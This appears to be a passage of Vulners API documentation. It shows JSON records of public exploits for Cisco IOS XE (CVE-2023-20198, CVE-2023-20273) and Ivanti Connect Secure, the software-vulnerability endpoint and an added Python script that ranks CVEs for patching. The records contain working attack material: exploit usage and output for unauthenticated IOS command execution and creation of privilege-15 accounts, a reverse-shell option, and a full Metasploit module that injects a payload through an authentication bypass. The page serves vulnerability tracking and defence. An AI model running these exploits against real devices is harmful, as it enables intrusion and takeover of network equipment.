It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. 
See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. 
There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
},
{
"lastseen": "2024-08-23T13:18:36",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "5770078F-F5C7-5063-98C6-7C111F447FB3",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/CVE-2023-20198-Checker",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/5770078F-F5C7-5063-98C6-7C111F447FB3"
},
{
"lastseen": "2024-08-13T16:25:12",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273"
],
"description": "# CVE-2023-20273\nCVE-2023-20273 Exploit PoC\n\n## Usage\n```\nusage: exploit.py [-h] -t URL -u Username -p Password (-c Command | -r) [-dest Outfile] [-www | -tcp | -null] [-ip LocalIP] [-port LocalPort] [-fs filesystem] [-path filepath] [-operation operation_type] [-v] [-q]\n\nCVE-2023-20273 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n\nTarget options:\n [Mandatory] Target arguments\n\n -t URL, --url URL Target Cisco URL (eg https://192.168.1.1 or http://192.168.2.2:8080)\n -u Username, --user Username Cisco webui user name\n -p Password, --pass Password Cisco webui user pass\n\nExploit mode:\n [Mandatory] Exec command or reverse shell\n\n -c Command Command to run\n -r Reverse shell (requires -ip and -port)\n\nOutput Options:\n [Optional] Command output options\n\n -dest Outfile [-r | -www | -tcp] destination file (default: random)\n -www [Default] Attempt to retrieve output via target web server\n -tcp [Not implemented] Attempt to send output to a TCP listener (requires -ip and -port)\n -null Do not attempt to get command output\n\nCallback Options:\n For reverse shell or command output\n\n -ip LocalIP Local IP for reverse shell/command output\n -port LocalPort Local port for reverse shell/command output\n\nExploit options:\n [Not implemented] Exploit modifiers\n\n -fs filesystem Filesystem on target for exploit staging (default: flash)\n -path filepath Filepath on target filesystem for exploit staging (default: shellsmoke)\n -operation operation_type Install operation type (not currently implemented) (default: SMU)\n\nVerbosity control:\n -v Verbose output\n -q Suppress Banner\n```\n",
"modified": "2024-08-12T20:33:05",
"id": "80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011",
"published": "2023-12-09T07:25:43",
"href": "https://github.com/smokeintheshell/CVE-2023-20273",
"type": "githubexploit",
"title": "Exploit for OS Command Injection in Cisco Ios Xe",
"cvss": {
"score": 7.2,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011"
}
]
Vulnerabilities/exploits by software name¶
Vulnerabilities by software + version:
Required parameters:
- software (str): name of the software. For example, "httpd".
- apiKey: Activated API key to authenticate the request.
Note
The software name can be a non-exact match, such as "ivanti connect secure", "connect secure", "connect_secure", etc. However, it is better to specify the exact version to obtain precise results.
Optional parameters:
- version (str): version of the software. For example, "2.1".
- vendor (str): The vendor of the software. For example, "Apache".
- respect_major_version (str): If true, limits results to the specified major version. Default is false.
- exclude_any_version (str): If true, excludes extended versions and returns only the exact match. Default is false.
- only_ids (bool): If true, returns only the IDs of the vulnerabilities. Default is false.
Query:
POST /api/v3/burp/softwareapi/
Query example:
curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H 'Content-Type: application/json' -d '{
"software": "connect secure",
"version": "22.3",
"vendor": "Ivanti",
"respect_major_version": "true",
"exclude_any_version": "true",
"only_ids": "false",
"maxVulnerabilities": 10,
"apiKey": "{API key}"
}'
results = vulners_api.get_software_vulnerabilities(
name="connect secure",
version="22.3",
vendor="Ivanti",
respect_major_version="true",
exclude_any_version="true",
only_ids="false"
)
exploit_list = results.get('exploit')
vulnerabilities_list = [results.get(key) for key in results if key in ['exploit']]
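As an added example (not part of the Vulners documentation or SDK), the following Python script builds the request body described above and triages the family-keyed result dict that get_software_vulnerabilities returns into a per-CVE view: highest CVSS score, number of public exploit bulletins, and the feeds they come from. It assumes only the record shape shown in this section (id, type, cvelist and the cvss / cvss2 / cvss3 blocks). The fetch helper is a plain urllib POST to the endpoint and returns the decoded body unchanged, because the raw response envelope is not shown here; the boolean flags are sent as the strings "true"/"false", as the curl example does. SAMPLE_RESULTS is constructed from (and trimmed down to) records in the response above, with the Metasploit record left without cvss2/cvss3 blocks to exercise the score fallback.

```python
"""Offline triage of a /api/v3/burp/softwareapi/ result.

Added example, not Vulners' own code or SDK. It assumes the shape shown in
this section: the SDK returns a dict keyed by bulletin family ("exploit",
...), each value a list of bulletin records with "id", "type", "cvelist"
and optional "cvss", "cvss2" and "cvss3" score blocks.
"""
import json
import urllib.request
from collections import defaultdict

API_URL = "https://vulners.com/api/v3/burp/softwareapi/"


def build_request(software, api_key, version=None, vendor=None,
                  respect_major_version=False, exclude_any_version=False,
                  only_ids=False, max_vulnerabilities=10):
    """Build the JSON body for the endpoint.

    The documented flags are typed (str) and the curl example sends them as
    the strings "true"/"false", so Python booleans are lowered to that form.
    """
    body = {
        "software": software,
        "apiKey": api_key,
        "respect_major_version": str(respect_major_version).lower(),
        "exclude_any_version": str(exclude_any_version).lower(),
        "only_ids": str(only_ids).lower(),
        "maxVulnerabilities": max_vulnerabilities,
    }
    if version:
        body["version"] = version
    if vendor:
        body["vendor"] = vendor
    return body


def fetch(body, timeout=15):
    """POST the body to the endpoint and return the decoded JSON (network call)."""
    req = urllib.request.Request(
        API_URL, data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def best_cvss(record):
    """Prefer the CVSS v3 base score, then v2, then the flat 'cvss' score."""
    v3 = ((record.get("cvss3") or {}).get("cvssV3") or {}).get("baseScore")
    if v3 is not None:
        return float(v3)
    v2 = ((record.get("cvss2") or {}).get("cvssV2") or {}).get("baseScore")
    if v2 is not None:
        return float(v2)
    return float((record.get("cvss") or {}).get("score") or 0.0)


def summarize_by_cve(results):
    """Collapse bulletin records into one row per CVE: highest score, number
    of public exploit bulletins, and which feeds (zdt, metasploit,
    githubexploit, ...) carry them. A record listing several CVEs counts
    towards each of them."""
    rows = defaultdict(lambda: {"max_cvss": 0.0, "exploits": 0,
                                "sources": set(), "ids": []})
    for family, records in results.items():
        for rec in records or []:
            score = best_cvss(rec)
            is_exploit = family == "exploit" or rec.get("bulletinFamily") == "exploit"
            for cve in rec.get("cvelist", []):
                row = rows[cve]
                row["max_cvss"] = max(row["max_cvss"], score)
                row["exploits"] += 1 if is_exploit else 0
                row["sources"].add(rec.get("type", "unknown"))
                row["ids"].append(rec["id"])
    return dict(rows)


def rank(summary):
    """Order CVEs for patching: exploit availability first, then score."""
    return sorted(summary.items(),
                  key=lambda kv: (kv[1]["exploits"], kv[1]["max_cvss"]),
                  reverse=True)


# Constructed sample mirroring (and trimming) records from the response above;
# the third record deliberately lacks cvss2/cvss3 to exercise the fallback.
SAMPLE_RESULTS = {
    "exploit": [
        {"id": "1337DAY-ID-39263", "type": "zdt", "bulletinFamily": "exploit",
         "cvelist": ["CVE-2023-46805", "CVE-2024-21887"],
         "cvss": {"score": 6.4},
         "cvss2": {"cvssV2": {"baseScore": 6.4}},
         "cvss3": {"cvssV3": {"baseScore": 9.1}}},
        {"id": "6506C020-5958-5996-9B02-569C9EF08B42", "type": "githubexploit",
         "bulletinFamily": "exploit", "cvelist": ["CVE-2024-21893"],
         "cvss": {"score": 6.4},
         "cvss2": {"cvssV2": {"baseScore": 6.4}},
         "cvss3": {"cvssV3": {"baseScore": 8.2}}},
        {"id": "MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2023_46805-",
         "type": "metasploit", "bulletinFamily": "exploit",
         "cvelist": ["CVE-2023-46805", "CVE-2024-21887"],
         "cvss": {"score": 6.4}},
    ],
}

if __name__ == "__main__":
    # Live use: fetch(build_request("connect secure", "{API key}", version="22.3",
    #                               vendor="Ivanti", respect_major_version=True))
    for cve, row in rank(summarize_by_cve(SAMPLE_RESULTS)):
        print(f"{cve}: max CVSS {row['max_cvss']}, {row['exploits']} exploit(s) "
              f"via {sorted(row['sources'])}")
```

Run as a script it prints the ranked list for the sample; for live use, unwrap the body returned by fetch to the family-keyed dict and pass it to summarize_by_cve. Ranking exploit-backed CVEs above higher-scored but unexploited ones is the ordering a patch queue fed from this endpoint usually wants.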
[
[
{
"id": "1337DAY-ID-39263",
"type": "zdt",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution Exploit",
"description": "This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.",
"published": "2024-01-22T00:00:00",
"modified": "2024-01-22T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://0day.today/exploit/description/39263",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T12:57:46",
"sourceHref": "https://0day.today/exploit/39263",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n also vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n ],\n 'References' => [\n ['CVE', '2023-46805'], # The auth bypass vulnerability.\n ['CVE', '2024-21887'], # The command injection vulnerability.\n ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n ],\n 'DisclosureDate' => '2024-01-10',\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true, # Code execution as root.\n 'Targets' => [\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # 
cmd/unix/reverse_bash\n # cmd/unix/reverse_python\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'FETCH_WRITABLE_DIR' => '/tmp'\n },\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n end\n\n def check\n # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n # the target system version information. If this requests succeeds, the target is vulnerable.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n return CheckCode::Safe if res.code != 200\n\n # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n # response, this is only for display purposes, we don't need to test the version information.\n\n json_data = res.get_json_document\n\n name = json_data.dig('software-inventory', 'software', 'name')\n\n version = json_data.dig('software-inventory', 'software', 'version')\n\n build = json_data.dig('software-inventory', 'software', 'build')\n\n # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n # get_json_document could not parse the JSON (and will return an empty Hash).\n return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? 
|| build.nil?\n\n Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n end\n\n def exploit\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n 'ctype' => 'application/json',\n 'data' => {\n 'type' => \";#{payload.encoded} #\",\n 'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n 'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n 'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n 'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n }.to_json\n )\n end\nend\n",
"ai_score": {
"value": 8.8,
"uncertanity": 2.2,
"vector": "NONE"
}
},
{
"id": "140A9C1C-31CF-5F6B-8425-FE1B5620B837",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Command Injection in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python exploit.py -u <URL>`\n - Bulk scan: `python exploit.py -f <file-path>`\n - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-20T19:15:23",
"modified": "2024-01-21T12:09:30",
"cvss": {
"score": 5.8,
"vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8
},
"severity": "MEDIUM",
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://github.com/tucommenceapousser/CVE-2024-21887",
"cvelist": [
"CVE-2024-21887"
],
"lastseen": "2024-02-12T15:15:52",
"ai_score": {
"value": 8.2,
"uncertanity": 1.7,
"vector": "NONE"
}
},
{
"id": "1CBA6E14-5A29-5E20-B64D-BA04F0DC2C45",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "19/01/2024 ***** Update *******\nUpdated with the latest info based on Assetnote's blog. \nNow three checks are executed before a status is shown, this also to better detect older versions of Avanti\n\nBlogs with analysis of the CVE:\nhttps://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis\nhttps://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce\n\n# CVE-2023-46805\nSimple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices\n\n1. Scan a service like Shodan or Censys for the relevant devices and create a list of ip_adresses.\n2. Save them to \"ip_list.txt\" and in the same folder as this script\n3. run the script and it will show output to screen and save to a csv file once finished\n\n",
"published": "2024-01-16T08:05:58",
"modified": "2024-01-30T08:26:45",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/cbeek-r7/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:16:56",
"ai_score": {
"value": 9.0,
"uncertanity": 0.2,
"vector": "NONE"
}
},
{
"id": "6506C020-5958-5996-9B02-569C9EF08B42",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Server-Side Request Forgery in Ivanti Connect Secure",
